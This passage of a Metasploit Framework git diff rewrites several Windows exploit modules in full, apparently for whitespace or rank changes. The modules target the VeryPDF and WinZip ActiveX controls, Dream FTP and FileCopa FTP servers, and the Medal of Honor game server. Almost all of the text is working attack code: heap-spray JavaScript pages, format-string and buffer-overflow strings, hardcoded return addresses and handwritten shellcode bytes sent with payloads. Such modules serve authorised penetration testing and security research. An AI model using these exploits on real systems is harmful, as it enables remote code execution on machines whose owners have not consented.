-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow',
-			'Description'    => %q{
-				The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow
-				because it fails to properly bounds-check user-supplied data before copying
-				it into an insufficiently sized memory buffer. An attacker can exploit this issue
-				to execute arbitrary code within the context of the affected application.
-				},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'MC', 'dean <dean [at] zerodaysolutions [dot] com>' ], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-				    	[ 'CVE', '2008-5492'],
-					[ 'OSVDB', '49871'],
-					[ 'BID','32313' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00",
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]	
-				],
-			'DisclosureDate' => 'June 16 2008',
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		# Re-generate the payload.
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode.
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		# Create some nops.	
-		nops    = Rex::Text.to_unescape(make_nops(4))
-	
-		# Set the return.
-		ret    = Rex::Text.uri_encode([target.ret].pack('L'))
-				
-		# Randomize the javascript variable names.
-		vname  = rand_text_alpha(rand(100) + 1)
-		var_i  = rand_text_alpha(rand(30)  + 2)
-		rand1  = rand_text_alpha(rand(100) + 1)
-		rand2  = rand_text_alpha(rand(100) + 1)
-		rand3  = rand_text_alpha(rand(100) + 1)
-		rand4  = rand_text_alpha(rand(100) + 1)
-		rand5  = rand_text_alpha(rand(100) + 1)
-		rand6  = rand_text_alpha(rand(100) + 1)
-		rand7  = rand_text_alpha(rand(100) + 1)
-		rand8  = rand_text_alpha(rand(100) + 1)
-
-		content = %Q|
-         <html>
-            <object id='#{vname}' classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252'></object>
-            <script language="JavaScript">
-            var #{rand1} = unescape('#{shellcode}');
-            var #{rand2} = unescape('#{ret}');
-            var #{rand3} = 20;
-            var #{rand4} = #{rand3} + #{rand1}.length;
-            while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
-            var #{rand5} = #{rand2}.substring(0,#{rand4});
-            var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
-            while (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
-            var #{rand7} = new Array();
-            for (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
-            var #{rand8} = "";
-            for (#{var_i} = 0; #{var_i} < 7024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
-            #{vname}.OpenPDF(#{rand8}, 1, 1);
-            </script>
-         </html>
-			|
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-		
-		# Handle the payload
-		handler(cli)
-	end
-
-end
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow',
+			'Description'    => %q{
+				The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow
+				because it fails to properly bounds-check user-supplied data before copying
+				it into an insufficiently sized memory buffer. An attacker can exploit this issue
+				to execute arbitrary code within the context of the affected application.
+				},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC', 'dean <dean [at] zerodaysolutions [dot] com>' ], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+				    	[ 'CVE', '2008-5492'],
+					[ 'OSVDB', '49871'],
+					[ 'BID','32313' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]	
+				],
+			'DisclosureDate' => 'June 16 2008',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload.
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode.
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		# Create some nops.	
+		nops    = Rex::Text.to_unescape(make_nops(4))
+	
+		# Set the return.
+		ret    = Rex::Text.uri_encode([target.ret].pack('L'))
+				
+		# Randomize the javascript variable names.
+		vname  = rand_text_alpha(rand(100) + 1)
+		var_i  = rand_text_alpha(rand(30)  + 2)
+		rand1  = rand_text_alpha(rand(100) + 1)
+		rand2  = rand_text_alpha(rand(100) + 1)
+		rand3  = rand_text_alpha(rand(100) + 1)
+		rand4  = rand_text_alpha(rand(100) + 1)
+		rand5  = rand_text_alpha(rand(100) + 1)
+		rand6  = rand_text_alpha(rand(100) + 1)
+		rand7  = rand_text_alpha(rand(100) + 1)
+		rand8  = rand_text_alpha(rand(100) + 1)
+
+		content = %Q|
+         <html>
+            <object id='#{vname}' classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252'></object>
+            <script language="JavaScript">
+            var #{rand1} = unescape('#{shellcode}');
+            var #{rand2} = unescape('#{ret}');
+            var #{rand3} = 20;
+            var #{rand4} = #{rand3} + #{rand1}.length;
+            while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
+            var #{rand5} = #{rand2}.substring(0,#{rand4});
+            var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
+            while (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
+            var #{rand7} = new Array();
+            for (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
+            var #{rand8} = "";
+            for (#{var_i} = 0; #{var_i} < 7024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
+            #{vname}.OpenPDF(#{rand8}, 1, 1);
+            </script>
+         </html>
+			|
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end
diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb
index 30307310dc..f2eeebf6e3 100644
--- a/modules/exploits/windows/browser/winzip_fileview.rb
+++ b/modules/exploits/windows/browser/winzip_fileview.rb
@@ -1,124 +1,124 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
+###
+## This file is part of the Metasploit Framework and may be subject to
+## redistribution and commercial restrictions. Please see the Metasploit
+## Framework web site for more information on licensing and terms of use.
+## http://metasploit.com/framework/
+###
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	include Msf::Exploit::Remote::BrowserAutopwn
-	autopwn_info({
-		:ua_name    => HttpClients::IE,
-		:javascript => true, 
-		:os_name    => OperatingSystems::WINDOWS,
-		:vuln_test  => 'CreateNewFolderFromName',
-		:classid    => '{A09AE68F-B14D-43ED-B713-BA413F034904}',
-		:rank       => NormalRanking  # reliable memory corruption
-	})
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow',
-			'Description'    => %q{
-				The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a 
-				remote attacker to execute arbitrary code on the system. The control contains 
-				several unsafe methods and is marked safe for scripting and safe for initialization. 
-				A remote attacker could exploit this vulnerability to execute arbitrary code on the 
-				victim system. WinZip 10.0 <= Build 6667 are vulnerable.
-				},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'dean <dean[at]zerodaysolutions.com>' ], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'CVE','2006-5198' ],
-					[ 'OSVDB', '30433' ],
-					[ 'BID','21060' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00",
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]	
-				],
-			'DisclosureDate' => 'Nov 2 2007',
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		# Re-generate the payload.
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode.
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-	
-		# Set the return.
-		ret    = Rex::Text.uri_encode([target.ret].pack('L'))
-				
-		# Randomize the javascript variable names.
-		vname  = rand_text_alpha(rand(100) + 1)
-		var_i  = rand_text_alpha(rand(30)  + 2)
-		rand1  = rand_text_alpha(rand(100) + 1)
-		rand2  = rand_text_alpha(rand(100) + 1)
-		rand3  = rand_text_alpha(rand(100) + 1)
-		rand4  = rand_text_alpha(rand(100) + 1)
-		rand5  = rand_text_alpha(rand(100) + 1)
-		rand6  = rand_text_alpha(rand(100) + 1)
-		rand7  = rand_text_alpha(rand(100) + 1)
-		rand8  = rand_text_alpha(rand(100) + 1)
-
-		content = %Q|
-         <html>
-            <object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
-            <script language="JavaScript">
-            var #{rand1} = unescape('#{shellcode}');
-            var #{rand2} = unescape('#{ret}');
-            var #{rand3} = 20;
-            var #{rand4} = #{rand3} + #{rand1}.length;
-            while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
-            var #{rand5} = #{rand2}.substring(0,#{rand4});
-            var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
-            while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
-            var #{rand7} = new Array();
-            for (#{var_i} = 0; #{var_i} < 800; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
-            var #{rand8} = "A";
-            for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
-            #{vname}.CreateNewFolderFromName(#{rand8});
-            </script>
-         </html>
-			|
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-		
-		# Handle the payload
-		handler(cli)
-	end
-
-end
-
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({
+		:ua_name    => HttpClients::IE,
+		:javascript => true, 
+		:os_name    => OperatingSystems::WINDOWS,
+		:vuln_test  => 'CreateNewFolderFromName',
+		:classid    => '{A09AE68F-B14D-43ED-B713-BA413F034904}',
+		:rank       => NormalRanking  # reliable memory corruption
+	})
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow',
+			'Description'    => %q{
+				The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a 
+				remote attacker to execute arbitrary code on the system. The control contains 
+				several unsafe methods and is marked safe for scripting and safe for initialization. 
+				A remote attacker could exploit this vulnerability to execute arbitrary code on the 
+				victim system. WinZip 10.0 <= Build 6667 are vulnerable.
+				},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'dean <dean[at]zerodaysolutions.com>' ], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'CVE','2006-5198' ],
+					[ 'OSVDB', '30433' ],
+					[ 'BID','21060' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ]	
+				],
+			'DisclosureDate' => 'Nov 2 2007',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload.
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode.
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+	
+		# Set the return.
+		ret    = Rex::Text.uri_encode([target.ret].pack('L'))
+				
+		# Randomize the javascript variable names.
+		vname  = rand_text_alpha(rand(100) + 1)
+		var_i  = rand_text_alpha(rand(30)  + 2)
+		rand1  = rand_text_alpha(rand(100) + 1)
+		rand2  = rand_text_alpha(rand(100) + 1)
+		rand3  = rand_text_alpha(rand(100) + 1)
+		rand4  = rand_text_alpha(rand(100) + 1)
+		rand5  = rand_text_alpha(rand(100) + 1)
+		rand6  = rand_text_alpha(rand(100) + 1)
+		rand7  = rand_text_alpha(rand(100) + 1)
+		rand8  = rand_text_alpha(rand(100) + 1)
+
+		content = %Q|
+         <html>
+            <object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
+            <script language="JavaScript">
+            var #{rand1} = unescape('#{shellcode}');
+            var #{rand2} = unescape('#{ret}');
+            var #{rand3} = 20;
+            var #{rand4} = #{rand3} + #{rand1}.length;
+            while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
+            var #{rand5} = #{rand2}.substring(0,#{rand4});
+            var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
+            while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
+            var #{rand7} = new Array();
+            for (#{var_i} = 0; #{var_i} < 800; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
+            var #{rand8} = "A";
+            for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
+            #{vname}.CreateNewFolderFromName(#{rand8});
+            </script>
+         </html>
+			|
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end
+
diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb
index bb8e12d767..d49a08136e 100644
--- a/modules/exploits/windows/ftp/dreamftp_format.rb
+++ b/modules/exploits/windows/ftp/dreamftp_format.rb
@@ -1,87 +1,87 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/ 
-##
-
-require 'msf/core'
-
-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/ 
+##
+
+require 'msf/core'
+
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
-
+
 	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
-			'Description'	=> %q{
-				This module exploits a format string overflow in the BolinTech
-				Dream FTP Server version 1.02. Based on the exploit by SkyLined.
-			},
-			'Author' 		=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
-			'Arch'		=> [ ARCH_X86 ],
-			'License'        	=> MSF_LICENSE,
-			'Version'        	=> '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2004-2074'],
-					[ 'OSVDB', '4986'],
-					[ 'BID', '9800'],
-					[ 'URL', 'http://www.milw0rm.com/exploits/823'],
-				],
-			'Platform' 	=> ['win'],
-			'Privileged'	=> false,
-			'Payload'		=>
-				{
-					'Space'			=> 1000,
-					'BadChars'		=> "\x00\x0a\x0d",
-					'StackAdjustment'	=> -3500,
-				},
-			'Targets' 		=>
-			[
-			# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
-				[
-					'Dream FTP Server v1.02 Universal',
-					{
-						'Offset'			=> 3957680, # 0x3c63ff-0x4f
-					}
-				],
-			],
-			'DisclosureDate' => 'Mar 03 2004',
-			'DefaultTarget' => 0))
-			
-			register_options(
-			[
-				Opt::RPORT(21),
-			], self.class)
-	end
-
-	def check
-		connect
-		banner = sock.get(-1,3)
-		disconnect
-		if (banner =~ /Dream FTP Server/)
-			return Exploit::CheckCode::Appears
-		end
-		return Exploit::CheckCode::Safe
-	end
-	
-	def exploit
-		connect
-		sleep(0.25)
-		sploit = "\xeb\x29"
-		sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
-		sploit << "@@@@@@@@" + payload.encoded
-		sock.put(sploit + "\r\n")
-		sleep(0.25)
-		handler
-		disconnect
-	end
-
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
+			'Description'	=> %q{
+				This module exploits a format string overflow in the BolinTech
+				Dream FTP Server version 1.02. Based on the exploit by SkyLined.
+			},
+			'Author' 		=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
+			'Arch'		=> [ ARCH_X86 ],
+			'License'        	=> MSF_LICENSE,
+			'Version'        	=> '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2004-2074'],
+					[ 'OSVDB', '4986'],
+					[ 'BID', '9800'],
+					[ 'URL', 'http://www.milw0rm.com/exploits/823'],
+				],
+			'Platform' 	=> ['win'],
+			'Privileged'	=> false,
+			'Payload'		=>
+				{
+					'Space'			=> 1000,
+					'BadChars'		=> "\x00\x0a\x0d",
+					'StackAdjustment'	=> -3500,
+				},
+			'Targets' 		=>
+			[
+			# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
+				[
+					'Dream FTP Server v1.02 Universal',
+					{
+						'Offset'			=> 3957680, # 0x3c63ff-0x4f
+					}
+				],
+			],
+			'DisclosureDate' => 'Mar 03 2004',
+			'DefaultTarget' => 0))
+			
+			register_options(
+			[
+				Opt::RPORT(21),
+			], self.class)
+	end
+
+	def check
+		connect
+		banner = sock.get(-1,3)
+		disconnect
+		if (banner =~ /Dream FTP Server/)
+			return Exploit::CheckCode::Appears
+		end
+		return Exploit::CheckCode::Safe
+	end
+	
+	def exploit
+		connect
+		sleep(0.25)
+		sploit = "\xeb\x29"
+		sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
+		sploit << "@@@@@@@@" + payload.encoded
+		sock.put(sploit + "\r\n")
+		sleep(0.25)
+		handler
+		disconnect
+	end
+
 end
diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb
index 0eacb75dbe..64edf00cef 100644
--- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb
+++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb
@@ -1,59 +1,59 @@
-require 'msf/core'
-
-
+require 'msf/core'
+
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
-
+
 	include Msf::Exploit::Remote::Ftp
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
-			'Description'    => %q{
-				This module exploits the buffer overflow found in the LIST command
-        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
-			},
-			'Author'         => [ 'Jacopo Cervini' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
+			'Description'    => %q{
+				This module exploits the buffer overflow found in the LIST command
+        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
+			},
+			'Author'         => [ 'Jacopo Cervini' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
 					[ 'CVE', '2006-3726' ],
-					[ 'OSVDB', '27389' ],
-					[ 'BID', '19065' ],
-				],
-			'Privileged'     => true,
-			'Payload'        =>
-				{
-					'Space'    => 400,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-					'StackAdjustment' => -3500,
-				},
-			'Platform' => 'win',
-
-			'Targets'        => 
-				[
-					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
-					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
-				],
-			'DisclosureDate' => 'Jul 19 2006',
-			'DefaultTarget' => 0))
-	end
-
-	
-	def exploit
-		connect_login
-
-		print_status("Trying target #{target.name}...")
-
-		sploit =  "A "
-		sploit << make_nops(target['Nops'])
-		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded 
-
-		send_cmd( ['LIST', sploit] , false)
-
-		handler
-		disconnect
-	end
-
+					[ 'OSVDB', '27389' ],
+					[ 'BID', '19065' ],
+				],
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 400,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'StackAdjustment' => -3500,
+				},
+			'Platform' => 'win',
+
+			'Targets'        => 
+				[
+					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
+					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
+				],
+			'DisclosureDate' => 'Jul 19 2006',
+			'DefaultTarget' => 0))
+	end
+
+	
+	def exploit
+		connect_login
+
+		print_status("Trying target #{target.name}...")
+
+		sploit =  "A "
+		sploit << make_nops(target['Nops'])
+		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded 
+
+		send_cmd( ['LIST', sploit] , false)
+
+		handler
+		disconnect
+	end
+
 end
diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb
index 0085327b6f..68afea0315 100644
--- a/modules/exploits/windows/games/mohaa_getinfo.rb
+++ b/modules/exploits/windows/games/mohaa_getinfo.rb
@@ -1,97 +1,97 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
-
-	include Msf::Exploit::Remote::Udp
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'Medal Of Honor Allied Assault getinfo Stack Overflow',
-			'Description'    => %q{
-							This module exploits a stack based buffer overflow in the getinfo
-							command of Medal Of Honor Allied Assault.
-			},
-			'Author'         => [ 'Jacopo Cervini' ],
-			'License'        => BSD_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2004-0735'],
-					[ 'OSVDB', '8061' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/357'],
-					[ 'BID', '10743'],
-				],
-			'Privileged'     => false,
-			'Payload'        =>
-				{
-					'Space'    => 512,
-					'BadChars' => "\x00",
-				},
-			'Platform'       => 'win',
-			'Targets'        => 
-				[
-					['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
-				],
-			'DisclosureDate' => 'Jul 17 2004',
-			'DefaultTarget' => 0))
-
-			register_options(
-				[
-					Opt::RPORT(12203)
-				], self.class)
-	end
-
-	def exploit
-		connect_udp
-
-		# We should convert this to metasm - Patrick
-		buf = 'B' * target['Rets'][0]
-		buf << "\x68\x76\x76\x76\x76"*9   	# PUSH 76767676 x 9
-		buf << "\x68\x7f\x7f\x7f\x7f"     	# PUSH 7F7F7F7F
-		buf << "\x57"			    	# PUSH EDI
-		buf << "\x58"			    	# POP EAX
-		buf << "\x32\x64\x24\x24"	    	# XOR AH,BYTE PTR SS:[ESP+24]
-		buf << "\x32\x24\x24"		    	# XOR AH,BYTE PTR SS:[ESP]
-		buf << "\x48"*150			    	# DEC EAX x 150
-		buf << "\x50\x50"			    	# PUSH EAX x 2
-		buf << "\x53"				# PUSH EBX
-		buf << "\x58"				# POP EAX
-		buf << "\x51"				# PUSH ECX
-		buf << "\x32\x24\x24"			# XOR AH,BYTE PTR SS:[ESP]
-		buf << "\x6a\x7f"				# PUSH 7F
-		buf << "\x5e"				# POP ESI
-		buf << "\x46"*37				# INC ESI
-		buf << "\x56"*10				# PUSH ESI
-		buf << "\x32\x44\x24\x24"		# XOR AL,BYTE PTR SS:[ESP+24]
-		buf << "\x49\x49"				# DEC ECX
-		buf << "\x31\x48\x34"			# XOR DWORD PTR DS:[EAX+34],ECX
-		buf << "\x58"*11				# POP EAX	
-		buf << "\x42"*66
-		buf << "\x3c"*4
-		buf << "\x42"*48
-		buf << [ target['Rets'][1] ].pack('V')
-
-		req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
-		req << "\r\n\r\n" + make_nops(32) + payload.encoded
-
-		udp_sock.put(req)	
-
-		handler
-		disconnect_udp
-	end
-
-end
+
+	include Msf::Exploit::Remote::Udp
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Medal Of Honor Allied Assault getinfo Stack Overflow',
+			'Description'    => %q{
+							This module exploits a stack based buffer overflow in the getinfo
+							command of Medal Of Honor Allied Assault.
+			},
+			'Author'         => [ 'Jacopo Cervini' ],
+			'License'        => BSD_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2004-0735'],
+					[ 'OSVDB', '8061' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/357'],
+					[ 'BID', '10743'],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 512,
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
+				],
+			'DisclosureDate' => 'Jul 17 2004',
+			'DefaultTarget' => 0))
+
+			register_options(
+				[
+					Opt::RPORT(12203)
+				], self.class)
+	end
+
+	def exploit
+		connect_udp
+
+		# We should convert this to metasm - Patrick
+		buf = 'B' * target['Rets'][0]
+		buf << "\x68\x76\x76\x76\x76"*9   	# PUSH 76767676 x 9
+		buf << "\x68\x7f\x7f\x7f\x7f"     	# PUSH 7F7F7F7F
+		buf << "\x57"			    	# PUSH EDI
+		buf << "\x58"			    	# POP EAX
+		buf << "\x32\x64\x24\x24"	    	# XOR AH,BYTE PTR SS:[ESP+24]
+		buf << "\x32\x24\x24"		    	# XOR AH,BYTE PTR SS:[ESP]
+		buf << "\x48"*150			    	# DEC EAX x 150
+		buf << "\x50\x50"			    	# PUSH EAX x 2
+		buf << "\x53"				# PUSH EBX
+		buf << "\x58"				# POP EAX
+		buf << "\x51"				# PUSH ECX
+		buf << "\x32\x24\x24"			# XOR AH,BYTE PTR SS:[ESP]
+		buf << "\x6a\x7f"				# PUSH 7F
+		buf << "\x5e"				# POP ESI
+		buf << "\x46"*37				# INC ESI
+		buf << "\x56"*10				# PUSH ESI
+		buf << "\x32\x44\x24\x24"		# XOR AL,BYTE PTR SS:[ESP+24]
+		buf << "\x49\x49"				# DEC ECX
+		buf << "\x31\x48\x34"			# XOR DWORD PTR DS:[EAX+34],ECX
+		buf << "\x58"*11				# POP EAX	
+		buf << "\x42"*66
+		buf << "\x3c"*4
+		buf << "\x42"*48
+		buf << [ target['Rets'][1] ].pack('V')
+
+		req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
+		req << "\r\n\r\n" + make_nops(32) + payload.encoded
+
+		udp_sock.put(req)	
+
+		handler
+		disconnect_udp
+	end
+
+end
diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb
